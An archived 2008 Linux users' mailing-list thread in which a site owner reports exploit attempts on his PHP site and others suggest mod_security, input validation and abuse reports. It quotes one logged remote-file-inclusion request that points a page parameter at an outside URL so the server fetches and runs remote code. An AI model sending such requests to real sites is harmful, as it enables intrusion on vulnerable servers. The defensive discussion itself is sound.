Re: OT: Website Exploits

Attachments:
Message as email (text/plain) (text/html) (text/plain)

Author: JD Austin
Date:
To: klsmith2020, Main PLUG discussion list
Subject: Re: OT: Website Exploits

Complain to their upstream provider.
I usually use nslookup/dig, traceroute, and whois to figure out who that is.

On Thu, Dec 4, 2008 at 8:43 AM, keith smith <klsmith2020@yahoo.com> wrote:

>
> Hi Joshua,
>
> I was hoping to find a place I could report these attempted exploits.
> Something like the spam email RBL's. If it does not exist, I wonder why.
>
> I do appreciate everyones input on how to secure our server and our code.
>
>
> ------------------------
> Keith Smith
> <http://www.netcodeman.com/>
>
>
>
> --- On *Wed, 12/3/08, Joshua Zeidner <jjzeidner@gmail.com>* wrote:
>
> From: Joshua Zeidner <jjzeidner@gmail.com>
> Subject: Re: OT: Website Exploits
> To: klsmith2020@yahoo.com, "Main PLUG discussion list" <
> plug-discuss@lists.plug.phoenix.az.us>
> Date: Wednesday, December 3, 2008, 6:23 PM
>
>
>
> Am I the only one who noticed that you *did not* ask how to secure your > site? ;)

>
> -jmz

>
> On Wed, Dec 3, 2008 at 6:17 PM, keith smith <klsmith2020@yahoo.com> wrote:
>
>>
>> It is a custom site. Basically one page does it all. Depending on what
>> parameters/arguments are used in the URL will depend on what content is
>> displayed. I setup a switch to test the URL parameters against know
>> values. If no know value is entered to defaults to the 404 page.
>>
>> I'm thinking that is pretty secure.
>>
>>
>> ------------------------
>> Keith Smith
>>
>>
>>
>> --- On *Wed, 12/3/08, Lisa Kachold <lisakachold@obnosis.com>* wrote:
>>
>> From: Lisa Kachold <lisakachold@obnosis.com>
>> Subject: RE: OT: Website Exploits
>> To: klsmith2020@yahoo.com, plug-discuss@lists.plug.phoenix.az.us
>> Date: Wednesday, December 3, 2008, 5:14 PM
>>
>>
>> What index.php are you using? Is this WordPress?
>> http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00030.html
>> There are many php exploits:
>> http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00031.html
>>
>>
>> www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
>> http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
>> ------------------------------
>> Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona
>> Department of Economic Security will provide a one hour presentation on
>> forensics.
>>
>> ------------------------------
>> Date: Wed, 3 Dec 2008 14:57:35 -0800
>> From: klsmith2020@yahoo.com
>> Subject: Re: OT: Website Exploits
>> To: plug-discuss@lists.plug.phoenix.az.us
>>
>>
>> Thank you for the heads up on mod_security. I'm not sure if that is
>> installed or not.
>>
>> Thanks again!
>>
>>
>> ------------------------
>> Keith Smith
>>
>>
>> --- On *Wed, 12/3/08, JD Austin <jd@twingeckos.com>* wrote:
>>
>> From: JD Austin <jd@twingeckos.com>
>> Subject: Re: OT: Website Exploits
>> To: klsmith2020@yahoo.com, "Main PLUG discussion list" <
>> plug-discuss@lists.plug.phoenix.az.us>
>> Date: Wednesday, December 3, 2008, 3:48 PM
>>
>> That is a fairly common tactic.
>> It exploits poor input validation and register globals in PHP.
>> Do yourself a huge favor and install mod_security (I assume you're using
>> apache?)
>> as an extra measure of security if you haven't already.
>>
>>
>> On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020@yahoo.com>wrote:
>>
>>
>> Hi,
>>
>> I am working on a website that gets a lot of exploit attempts.
>>
>> They mostly look like this: /index.php?display=
>> http://humano.ya.com/mysons/index.htm?
>>
>> Our code is set to disregard any value that is not expected.
>>
>> I'm wondering if there is a clearing house for reporting this type of
>> stuff. I have the IP address as reported.... if that is accurate.
>>
>> Thanks in advance!
>>
>> Keith
>>
>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>>
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>>
>>
>> ------------------------------
>> Send e-mail anywhere. No map, no compass. Get your Hotmail(R) account now.<http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>>
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

This message is part of the following thread:
	the complete thread tree sorted by date
	keith smith at
	JD Austin at